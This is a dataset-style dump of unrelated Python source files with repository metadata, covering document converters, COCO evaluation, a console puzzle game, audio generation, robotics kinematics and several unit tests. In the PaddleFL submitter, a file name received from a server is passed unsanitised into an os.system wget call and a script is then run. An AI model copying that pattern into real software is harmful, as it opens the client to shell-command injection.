blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0519b9a6c3d736fd51361e9def7cf66c291409c5
|
915ac708aeac53125f29bef90c2c047eaed4940e
|
/Anaconda/Scripts/rst2xetex.py
|
2d9179a588e56dbef11208ccd0ed3621286f9cc3
|
[] |
no_license
|
bopopescu/newGitTest
|
c8c480ddd585ef416a5ccb63cbc43e3019f92534
|
5a19f7d01d417a34170a8f760a76e6a8bb7c9274
|
refs/heads/master
| 2021-05-31T17:00:26.656450 | 2016-06-08T06:43:52 | 2016-06-08T06:43:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 795 |
py
|
#!C:\aroot\stage\python.exe
# $Id: rst2xetex.py 7038 2011-05-19 09:12:02Z milde $
# Author: Guenter Milde
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing XeLaTeX source code.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates XeLaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='xetex', description=description)
|
[
"[email protected]"
] | |
48f6fab3b18bb1659f37d45e12c7ea01398ed32a
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_bunts.py
|
41d450a12d291732d8830616446e29d1957fe2d2
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 214 |
py
|
#calss header
class _BUNTS():
def __init__(self,):
self.name = "BUNTS"
self.definitions = bunt
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['bunt']
|
[
"[email protected]"
] | |
e662722fad68cff102487d6ba08454d41807ad11
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/detection/YOLOX_Dynamic_ID4069_for_PyTorch/yolox/layers/fast_coco_eval_api.py
|
55bfa28a1c06813d48ff90862908a7655239001e
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 |
Apache-2.0
| 2022-10-15T09:29:12 | 2022-04-20T04:11:18 |
Python
|
UTF-8
|
Python
| false | false | 6,464 |
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# This file comes from
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/fast_eval_api.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Copyright (c) Megvii Inc. All rights reserved.
import copy
import time
import numpy as np
from pycocotools.cocoeval import COCOeval
from .jit_ops import FastCOCOEvalOp
class COCOeval_opt(COCOeval):
"""
This is a slightly modified version of the original COCO API, where the functions evaluateImg()
and accumulate() are implemented in C++ to speedup evaluation
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.module = FastCOCOEvalOp().load()
def evaluate(self):
"""
Run per image evaluation on given images and store results in self.evalImgs_cpp, a
datastructure that isn't readable from Python but is used by a c++ implementation of
accumulate(). Unlike the original COCO PythonAPI, we don't populate the datastructure
self.evalImgs because this datastructure is a computational bottleneck.
:return: None
"""
tic = time.time()
print("Running per image evaluation...")
p = self.params
# add backward compatibility if useSegm is specified in params
if p.useSegm is not None:
p.iouType = "segm" if p.useSegm == 1 else "bbox"
print(
"useSegm (deprecated) is not None. Running {} evaluation".format(
p.iouType
)
)
print("Evaluate annotation type *{}*".format(p.iouType))
p.imgIds = list(np.unique(p.imgIds))
if p.useCats:
p.catIds = list(np.unique(p.catIds))
p.maxDets = sorted(p.maxDets)
self.params = p
self._prepare()
# loop through images, area range, max detection number
catIds = p.catIds if p.useCats else [-1]
if p.iouType == "segm" or p.iouType == "bbox":
computeIoU = self.computeIoU
elif p.iouType == "keypoints":
computeIoU = self.computeOks
self.ious = {
(imgId, catId): computeIoU(imgId, catId)
for imgId in p.imgIds
for catId in catIds
}
maxDet = p.maxDets[-1]
# <<<< Beginning of code differences with original COCO API
def convert_instances_to_cpp(instances, is_det=False):
# Convert annotations for a list of instances in an image to a format that's fast
# to access in C++
instances_cpp = []
for instance in instances:
instance_cpp = self.module.InstanceAnnotation(
int(instance["id"]),
instance["score"] if is_det else instance.get("score", 0.0),
instance["area"],
bool(instance.get("iscrowd", 0)),
bool(instance.get("ignore", 0)),
)
instances_cpp.append(instance_cpp)
return instances_cpp
# Convert GT annotations, detections, and IOUs to a format that's fast to access in C++
ground_truth_instances = [
[convert_instances_to_cpp(self._gts[imgId, catId]) for catId in p.catIds]
for imgId in p.imgIds
]
detected_instances = [
[
convert_instances_to_cpp(self._dts[imgId, catId], is_det=True)
for catId in p.catIds
]
for imgId in p.imgIds
]
ious = [[self.ious[imgId, catId] for catId in catIds] for imgId in p.imgIds]
if not p.useCats:
# For each image, flatten per-category lists into a single list
ground_truth_instances = [
[[o for c in i for o in c]] for i in ground_truth_instances
]
detected_instances = [
[[o for c in i for o in c]] for i in detected_instances
]
# Call C++ implementation of self.evaluateImgs()
self._evalImgs_cpp = self.module.COCOevalEvaluateImages(
p.areaRng,
maxDet,
p.iouThrs,
ious,
ground_truth_instances,
detected_instances,
)
self._evalImgs = None
self._paramsEval = copy.deepcopy(self.params)
toc = time.time()
print("COCOeval_opt.evaluate() finished in {:0.2f} seconds.".format(toc - tic))
# >>>> End of code differences with original COCO API
def accumulate(self):
"""
Accumulate per image evaluation results and store the result in self.eval. Does not
support changing parameter settings from those used by self.evaluate()
"""
print("Accumulating evaluation results...")
tic = time.time()
if not hasattr(self, "_evalImgs_cpp"):
print("Please run evaluate() first")
self.eval = self.module.COCOevalAccumulate(self._paramsEval, self._evalImgs_cpp)
# recall is num_iou_thresholds X num_categories X num_area_ranges X num_max_detections
self.eval["recall"] = np.array(self.eval["recall"]).reshape(
self.eval["counts"][:1] + self.eval["counts"][2:]
)
# precision and scores are num_iou_thresholds X num_recall_thresholds X num_categories X
# num_area_ranges X num_max_detections
self.eval["precision"] = np.array(self.eval["precision"]).reshape(
self.eval["counts"]
)
self.eval["scores"] = np.array(self.eval["scores"]).reshape(self.eval["counts"])
toc = time.time()
print(
"COCOeval_opt.accumulate() finished in {:0.2f} seconds.".format(toc - tic)
)
|
[
"[email protected]"
] | |
fe484f2dbfa7363e12c93e00a34759692e113a73
|
f4b8c90c1349c8740c1805f7b6b0e15eb5db7f41
|
/test/test_term_session_item.py
|
7867f29a7aa4a6fd2bb993565b40f161db7abf86
|
[] |
no_license
|
CalPolyResDev/StarRezAPI
|
012fb8351159f96a81352d6c7bfa36cd2d7df13c
|
b184e1863c37ff4fcf7a05509ad8ea8ba825b367
|
refs/heads/master
| 2021-01-25T10:29:37.966602 | 2018-03-15T01:01:35 | 2018-03-15T01:01:35 | 123,355,501 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,044 |
py
|
# coding: utf-8
"""
StarRez API
This is a way to connect with the StarRez API. We are not the developers of the StarRez API, we are just an organization that uses it and wanted a better way to connect to it. # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import starrez_client
from starrez_client.models.term_session_item import TermSessionItem # noqa: E501
from starrez_client.rest import ApiException
class TestTermSessionItem(unittest.TestCase):
"""TermSessionItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTermSessionItem(self):
"""Test TermSessionItem"""
# FIXME: construct object with mandatory attributes with example values
# model = starrez_client.models.term_session_item.TermSessionItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
415935edef31996e2b359804e324f5f7b3d48614
|
ab9b75fcdd2b7352968886e5ed41ee7788216226
|
/src/gamesbyexample/stickyhands.py
|
a1af5601756ea83263f3a20e8dd2bb26220102ac
|
[
"MIT"
] |
permissive
|
mgocken/PythonStdioGames
|
d7b48cafbc33a027548cab08ad08aea6c0c81abd
|
036d2f142581fb74a38400721aecce15a695e1bc
|
refs/heads/master
| 2020-09-29T18:35:34.589307 | 2019-12-06T00:15:46 | 2019-12-06T00:15:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,528 |
py
|
# Sticky Hands, by Al Sweigart [email protected]
# A jewel-stealing, movement puzzle game.
__version__ = 1
# Inspired by Herding Cats https://w.itch.io/herding-cats
# TODO - Enter R to reset the entire level.
import copy, os, sys
# Setup the constants:
WALL = chr(9608)
FACE = chr(9786)
DIAMOND = chr(9830)
CHAR_MAP = {'#': WALL, '@': FACE, '$': DIAMOND, ' ': ' '} # TODO add comment
# Display the title banner and instructions:
print('''Sticky Hands: A diamond collecting game.
By Al Sweigart [email protected]
Pick up diamonds by standing next to them. Stuck diamonds also
become sticky. Try to stick every diamond in the level.
Enter WASD letters to move, numbers to switch levels, U to undo a
move, or "quit" to quit the game. You can enter multiple WASD or U
letters to make several moves at once.
''')
# Load each level from stickyhandslevels.txt
if not os.path.exists('stickyhandslevels.txt'):
print('Download the level file from https://github.com/asweigart/PythonStdioGames/blob/master/src/stickyhandslevels.txt')
sys.exit()
ALL_LEVELS = []
with open('stickyhandslevels.txt') as levelFile:
currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0} # Each level is represented by a dictionary.
y = 0
for line in levelFile.readlines():
if line.startswith(';'):
continue # Ignore comments in the level file.
if line == '\n':
if currentLevelFromFile == {'width': 0, 'height': 0, 'diamonds': 0}:
continue # Ignore this line, and continue to the next line.
# Finished with the current level:
ALL_LEVELS.append(currentLevelFromFile)
currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0}
y = 0 # Reset y back to 0.
continue
# Add the line to the current level.
# We use line[:-1] so we don't include the newline:
for x, levelChar in enumerate(line[:-1]):
currentLevelFromFile[(x, y)] = levelChar
# Keep track of how many diamonds are in the level:
if levelChar == '$':
currentLevelFromFile['diamonds'] += 1
y += 1
if len(line) - 1 > currentLevelFromFile['width']:
currentLevelFromFile['width'] = len(line) - 1
if y > currentLevelFromFile['height']:
currentLevelFromFile['height'] = y
def drawLevel(levelNum, levelData):
# Draw the current level.
print('Level #' + str(levelNum + 1), 'of', len(ALL_LEVELS))
for y in range(levelData['height']):
for x in range(levelData['width']):
prettyChar = CHAR_MAP[levelData.get((x, y), ' ')]
print(prettyChar, end='')
print()
def getPlayerBlobPoints(levelData, playerx, playery):
playerBlob = [(playerx, playery)]
pointsToCheck = [(playerx, playery)]
alreadyCheckedPoints = []
while len(pointsToCheck) > 0:
x, y = pointsToCheck.pop()
alreadyCheckedPoints.append((x, y))
if (x - 1, y) not in alreadyCheckedPoints and levelData[(x - 1, y)] == '$':
playerBlob.append((x - 1, y))
pointsToCheck.append((x - 1, y))
if (x + 1, y) not in alreadyCheckedPoints and levelData[(x + 1, y)] == '$':
playerBlob.append((x + 1, y))
pointsToCheck.append((x + 1, y))
if (x, y - 1) not in alreadyCheckedPoints and levelData[(x, y - 1)] == '$':
playerBlob.append((x, y - 1))
pointsToCheck.append((x, y - 1))
if (x, y + 1) not in alreadyCheckedPoints and levelData[(x, y + 1)] == '$':
playerBlob.append((x, y + 1))
pointsToCheck.append((x, y + 1))
return playerBlob
currentLevelNumber = 0
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
while True: # Main game loop.
drawLevel(currentLevelNumber, currentLevel)
# Get the input from the player:
moves = input('Enter moves> ').upper()
if moves == 'QUIT':
print('Thanks for playing!')
sys.exit()
if moves.isdecimal():
if not (1 <= int(moves) < len(ALL_LEVELS)):
print('Enter a level number between 1 and', len(ALL_LEVELS))
continue
# Change the current level:
currentLevelNumber = int(moves) - 1
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
continue
# Validate the input; make sure it only has W, A, S, D, or U:
movesAreValid = True
for move in moves:
if move not in ('W', 'A', 'S', 'D', 'U'):
movesAreValid = False
print(move, 'is not a valid move.')
break
if not movesAreValid:
continue
# Carry out the moves:
for move in moves:
# Find the player position:
for position, character in currentLevel.items():
if character == '@':
playerx, playery = position
if move == 'U':
if len(undoStack) == 1:
continue # Can't undo past the first move.
undoStack.pop() # Remove the last item from the undoStack list.
currentLevel = copy.copy(undoStack[-1])
continue
if move == 'W':
movex, movey = 0, -1
elif move == 'A':
movex, movey = -1, 0
elif move == 'S':
movex, movey = 0, 1
elif move == 'D':
movex, movey = 1, 0
playerBlob = getPlayerBlobPoints(currentLevel, playerx, playery)
blobCanMove = True
for blobPoint in playerBlob:
blobx, bloby = blobPoint[0], blobPoint[1]
moveToSpace = currentLevel.get((blobx + movex, bloby + movey), ' ')
# If the move-to space is a wall, don't move at all:
if moveToSpace == '#':
blobCanMove = False
break
if blobCanMove:
newBlobPoints = []
for blobPoint in playerBlob:
blobx, bloby = blobPoint[0], blobPoint[1]
# If the move-to space is empty or a goal, just move there:
if currentLevel[(blobx, bloby)] == '@':
currentLevel[(blobx, bloby)] = ' '
newBlobPoints.append((blobx + movex, bloby + movey, '@'))
elif currentLevel[(blobx, bloby)] == '$':
currentLevel[(blobx, bloby)] = ' '
newBlobPoints.append((blobx + movex, bloby + movey, '$'))
for newBlobPoint in newBlobPoints:
# Set the player's new position:
currentLevel[(newBlobPoint[0], newBlobPoint[1])] = newBlobPoint[2] # TODO - refactor this.
# Save the state of the level for the undo feature:
undoStack.append(copy.copy(currentLevel))
# Check if the player has finished the level:
levelIsSolved = False
playerBlob = getPlayerBlobPoints(currentLevel, playerx + movex, playery + movey)
if len(playerBlob) - 1 == currentLevel['diamonds']:
levelIsSolved = True
if levelIsSolved:
drawLevel(currentLevelNumber, currentLevel)
print('Level complete!')
input('Press Enter to continue...')
currentLevelNumber = (currentLevelNumber + 1) % len(ALL_LEVELS)
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
break # Don't carry out any remaining moves.
|
[
"[email protected]"
] | |
02e1b1ac9d7ca0fcf0fa59318c57df5d46403f9d
|
16809bf25066488f2f32f154dadef3e30c68ae68
|
/sine_wave.py
|
0ed35aeb1f8d136868fdb4c3053a10605cc1bcdf
|
[] |
no_license
|
aidiary/signal_processing
|
0db6d1a9662ccd0fe232ccc461e9b27174c8ef88
|
4c1cb8ceee3a1527f38b8dbf9ffa1a737d06b577
|
refs/heads/master
| 2021-01-13T03:44:32.721301 | 2016-12-23T13:40:10 | 2016-12-23T13:40:10 | 77,221,395 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,762 |
py
|
#coding: utf-8
import wave
import struct
import numpy as np
from pylab import *
def createSineWave (A, f0, fs, length):
"""振幅A、基本周波数f0、サンプリング周波数 fs、
長さlength秒の正弦波を作成して返す"""
data = []
# [-1.0, 1.0]の小数値が入った波を作成
for n in arange(length * fs): # nはサンプルインデックス
s = A * np.sin(2 * np.pi * f0 * n / fs)
# 振幅が大きい時はクリッピング
if s > 1.0: s = 1.0
if s < -1.0: s = -1.0
data.append(s)
# [-32768, 32767]の整数値に変換
data = [int(x * 32767.0) for x in data]
# plot(data[0:100]); show()
# バイナリに変換
data = struct.pack("h" * len(data), *data) # listに*をつけると引数展開される
return data
def play (data, fs, bit):
import pyaudio
# ストリームを開く
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paInt16,
channels=1,
rate=int(fs),
output= True)
# チャンク単位でストリームに出力し音声を再生
chunk = 1024
sp = 0 # 再生位置ポインタ
buffer = data[sp:sp+chunk]
while buffer != '':
stream.write(buffer)
sp = sp + chunk
buffer = data[sp:sp+chunk]
stream.close()
p.terminate()
def save(data, fs, bit, filename):
"""波形データをWAVEファイルへ出力"""
wf = wave.open(filename, "w")
wf.setnchannels(1)
wf.setsampwidth(bit / 8)
wf.setframerate(fs)
wf.writeframes(data)
wf.close()
if __name__ == "__main__" :
data = createSineWave(0.25, 250, 8000.0, 1.0)
play(data, 8000, 16)
save(data, 8000, 16, "sine.wav")
|
[
"[email protected]"
] | |
deb27eae24f4cd46475211751438e904854e037a
|
fcdfe976c9ed60b18def889692a17dc18a8dd6d7
|
/ros/py_ros/kdl_test2.py
|
120f3dc29d4eeaee751accf468dd08397df344f3
|
[] |
no_license
|
akihikoy/ay_test
|
4907470889c9bda11cdc84e8231ef3156fda8bd7
|
a24dfb720960bfedb94be3b4d147e37616e7f39a
|
refs/heads/master
| 2023-09-02T19:24:47.832392 | 2023-08-27T06:45:20 | 2023-08-27T06:45:20 | 181,903,332 | 6 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,517 |
py
|
#!/usr/bin/python
#\file kdl_test2.py
#\brief certain python script
#\author Akihiko Yamaguchi, [email protected]
#\version 0.1
import numpy as np
from kdl_kin import TKinematics
if __name__=='__main__':
np.set_printoptions(precision=3)
print 'Testing TKinematics (robot_description == Yaskawa Motoman is assumed).'
print 'Before executing this script, run:'
print ' rosparam load `rospack find motoman_sia10f_support`/urdf/sia10f.urdf robot_description'
kin= TKinematics(end_link='link_t')
kin.print_robot_description()
DoF= len(kin.joint_names)
q0= [0.0]*DoF
angles= {joint:q0[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x0= kin.forward_position_kinematics(angles)
print 'q1=',np.array(q1)
print 'x0= FK(q0)=',x0
import random
q1= [3.0*(random.random()-0.5) for j in range(DoF)]
angles= {joint:q1[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x1= kin.forward_position_kinematics(angles)
print 'q1=',q1
print 'x1= FK(q1)=',x1
seed= [0.0]*DoF
#seed= [3.0*(random.random()-0.5) for j in range(DoF)]
q2= kin.inverse_kinematics(x1[:3], x1[3:], seed=seed, maxiter=2000, eps=1.0e-4) #, maxiter=500, eps=1.0e-6
print 'q2= IK(x1)=',q2
if q2 is not None:
angles= {joint:q2[j] for j,joint in enumerate(kin.joint_names)} #Deserialize
x2= kin.forward_position_kinematics(angles)
print 'x2= FK(q2)=',x2
print 'x2==x1?', np.allclose(x2,x1)
print '|x2-x1|=',np.linalg.norm(x2-x1)
else:
print 'Failed to solve IK.'
|
[
"[email protected]"
] | |
862323cdd250fded22470d58b5b961390e8c4680
|
88748ec85d537e4b50ba45a255a0dcc3c154116f
|
/tests/unit/test_poll.py
|
2810d41f352a9741f36504ab9e9b2f71976b5c96
|
[
"MIT"
] |
permissive
|
byrgazov/vanilla
|
17c53843b1b2f6b5484e4ff8e2fab54123245cc0
|
2896ae049d9e58ef3b4008a869ebf481951d0780
|
refs/heads/master
| 2020-07-30T12:30:04.497223 | 2020-07-24T10:08:03 | 2020-07-24T10:08:03 | 210,235,284 | 0 | 0 |
MIT
| 2019-09-23T00:49:06 | 2019-09-23T00:49:06 | null |
UTF-8
|
Python
| false | false | 1,731 |
py
|
import os
import vanilla.poll
class TestPoll(object):
def test_poll(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
assert poll.poll(timeout=0) == []
os.write(w, '1')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
# test event is cleared
assert poll.poll(timeout=0) == []
# test event is reset on new write after read
assert os.read(r, 4096) == '1'
assert poll.poll(timeout=0) == []
os.write(w, '2')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
assert poll.poll(timeout=0) == []
# test event is reset on new write without read
os.write(w, '3')
assert poll.poll() == [(r, vanilla.poll.POLLIN)]
assert poll.poll(timeout=0) == []
assert os.read(r, 4096) == '23'
def test_write_close(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
poll.register(w, vanilla.poll.POLLOUT)
assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
assert poll.poll(timeout=0) == []
os.close(w)
assert poll.poll() == [(r, vanilla.poll.POLLERR)]
assert poll.poll(timeout=0) == []
def test_read_close(self):
poll = vanilla.poll.Poll()
r, w = os.pipe()
poll.register(r, vanilla.poll.POLLIN)
poll.register(w, vanilla.poll.POLLOUT)
assert poll.poll() == [(w, vanilla.poll.POLLOUT)]
assert poll.poll(timeout=0) == []
os.close(r)
got = poll.poll()
assert got == [(w, vanilla.poll.POLLOUT), (w, vanilla.poll.POLLERR)]
assert poll.poll(timeout=0) == []
|
[
"[email protected]"
] | |
c008d92d5264518d006a4ff9b43acef4f19e4c38
|
30b004cad2c14b47b5f66c3a4a0015e05ca4a27e
|
/contrib/data_safety_training/image_classification/submitter.py
|
920b60ad8fed2d7ff0b13d17001d8227f3b0abb8
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleFL
|
66c26f774eeadc25c12e74056ac389e0c1f61b84
|
dcc00c5dff62c3dd0092801f4e9b89d8c0957d3d
|
refs/heads/master
| 2023-08-07T22:05:24.806573 | 2023-03-21T01:15:10 | 2023-03-21T01:15:10 | 210,873,203 | 486 | 136 |
Apache-2.0
| 2023-07-26T22:30:57 | 2019-09-25T15:01:39 |
Python
|
UTF-8
|
Python
| false | false | 1,090 |
py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zmq
import socket
import msgpack
import os
mission_dict = {"mission": "image classification", "image_size": [3, 32, 32]}
#send request
context = zmq.Context()
zmq_socket = context.socket(zmq.REQ)
zmq_socket.connect("tcp://127.0.0.1:60001")
zmq_socket.send(msgpack.dumps(mission_dict))
#get and download encoder
file = zmq_socket.recv()
os.system("wget 127.0.0.1:8080/{}".format(file))
#data encoding
os.system("python -u user.py > user.log")
zmq_socket.send("complete")
|
[
"[email protected]"
] | |
a31688d8579cfce253b6dac4f680333340f6b0e4
|
0bde5f7f09aa537ed1f4828d4e5ebee66475918f
|
/h2o-py/tests/testdir_sklearn/pyunit_sklearn_params.py
|
2a70a91baafd68393e95b43969166ffea1f8a2ea
|
[
"Apache-2.0"
] |
permissive
|
Winfredemalx54/h2o-3
|
d69f1c07e1f5d2540cb0ce5e6073415fa0780d32
|
dfb163c82ff3bfa6f88cdf02465a9bb4c8189cb7
|
refs/heads/master
| 2022-12-14T08:59:04.109986 | 2020-09-23T08:36:59 | 2020-09-23T08:36:59 | 297,947,978 | 2 | 0 |
Apache-2.0
| 2020-09-23T11:28:54 | 2020-09-23T11:28:54 | null |
UTF-8
|
Python
| false | false | 7,702 |
py
|
from __future__ import print_function
import os, sys
from sklearn.pipeline import Pipeline
from h2o.sklearn import H2OAutoMLEstimator, H2OGradientBoostingEstimator, H2OScaler, H2OPCA
sys.path.insert(1, os.path.join("..",".."))
from tests import pyunit_utils
seed = 2019
def test_all_params_are_visible_in_get_params():
pipeline = Pipeline([
('standardize', H2OScaler(center=True, scale=False)),
('pca', H2OPCA(k=2, seed=seed)),
('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
])
params = pipeline.get_params()
assert isinstance(params['standardize'], H2OScaler)
assert params['standardize__center'] is True
assert params['standardize__scale'] is False
assert isinstance(params['pca'], H2OPCA)
assert params['pca__k'] == 2
assert params['pca__seed'] == seed
assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
assert params['estimator__ntrees'] == 20
assert params['estimator__max_depth'] == 5
assert params['estimator__seed'] == seed
# also the ones that were not set explicitly
assert params['pca__max_iterations'] is None
assert params['estimator__learn_rate'] is None
def test_all_params_can_be_set_using_set_params():
pipeline = Pipeline([
('standardize', H2OScaler()),
('pca', H2OPCA()),
('estimator', H2OGradientBoostingEstimator())
])
pipeline.set_params(
standardize__center=True,
standardize__scale=False,
pca__k=2,
pca__seed=seed,
estimator__ntrees=20,
estimator__max_depth=5,
estimator__seed=seed
)
assert isinstance(pipeline.named_steps.standardize, H2OScaler)
assert pipeline.named_steps.standardize.center is True
assert pipeline.named_steps.standardize.scale is False
assert isinstance(pipeline.named_steps.pca, H2OPCA)
assert pipeline.named_steps.pca.k == 2
assert pipeline.named_steps.pca.seed == seed
assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
assert pipeline.named_steps.estimator.ntrees == 20
assert pipeline.named_steps.estimator.max_depth == 5
assert pipeline.named_steps.estimator.seed == seed
def test_all_params_are_accessible_as_properties():
pipeline = Pipeline([
('standardize', H2OScaler(center=True, scale=False)),
('pca', H2OPCA(k=2, seed=seed)),
('estimator', H2OGradientBoostingEstimator(ntrees=20, max_depth=5, seed=seed))
])
assert isinstance(pipeline.named_steps.standardize, H2OScaler)
assert pipeline.named_steps.standardize.center is True
assert pipeline.named_steps.standardize.scale is False
assert isinstance(pipeline.named_steps.pca, H2OPCA)
assert pipeline.named_steps.pca.k == 2
assert pipeline.named_steps.pca.seed == seed
assert isinstance(pipeline.named_steps.estimator, H2OGradientBoostingEstimator)
assert pipeline.named_steps.estimator.ntrees == 20
assert pipeline.named_steps.estimator.max_depth == 5
assert pipeline.named_steps.estimator.seed == seed
# also the ones that were not set explicitly
assert pipeline.named_steps.pca.max_iterations is None
assert pipeline.named_steps.estimator.learn_rate is None
def test_all_params_can_be_set_as_properties():
pipeline = Pipeline([
('standardize', H2OScaler()),
('pca', H2OPCA()),
('estimator', H2OGradientBoostingEstimator())
])
pipeline.named_steps.standardize.center = True
pipeline.named_steps.standardize.scale = False
pipeline.named_steps.pca.k = 2
pipeline.named_steps.pca.seed = seed
pipeline.named_steps.estimator.ntrees = 20
pipeline.named_steps.estimator.max_depth = 5
pipeline.named_steps.estimator.seed = seed
params = pipeline.get_params()
assert isinstance(params['standardize'], H2OScaler)
assert params['standardize__center'] is True
assert params['standardize__scale'] is False
assert isinstance(params['pca'], H2OPCA)
assert params['pca__k'] == 2
assert params['pca__seed'] == seed
assert isinstance(params['estimator'], H2OGradientBoostingEstimator)
assert params['estimator__ntrees'] == 20
assert params['estimator__max_depth'] == 5
assert params['estimator__seed'] == seed
def test_params_conflicting_with_sklearn_api_are_still_available():
pca = H2OPCA()
assert pca.transform != 'NONE'
assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
# conflicting param can be accessed normally using get_params()
assert pca.get_params()['transform'] == 'NONE'
# property is accessible directly using a trailing underscore
assert pca.transform_ == 'NONE'
pca = H2OPCA(transform='DEMEAN')
assert callable(pca.transform), "`transform` method from sklearn API has been replaced by a property"
assert pca.get_params()['transform'] == 'DEMEAN'
assert pca.transform_ == 'DEMEAN'
# conflicting param can be modified normally using set_params()
pca.set_params(transform='DESCALE')
assert pca.get_params()['transform'] == 'DESCALE'
assert pca.transform_ == 'DESCALE'
# conflicting property can be set directly using a trailing underscore
pca.transform_ = 'NORMALIZE'
assert pca.get_params()['transform'] == 'NORMALIZE'
assert pca.transform_ == 'NORMALIZE'
def test_params_are_correctly_passed_to_underlying_transformer():
pca = H2OPCA(seed=seed)
pca.set_params(transform='DEMEAN', k=3)
pca.model_id = "dummy"
assert pca.estimator is None
pca._make_estimator() # normally done when calling `fit`
assert pca.estimator
parms = pca.estimator._parms
assert parms['seed'] == seed
assert parms['transform'] == 'DEMEAN'
assert parms['k'] == 3
assert parms['model_id'] == "dummy"
assert parms['max_iterations'] is None
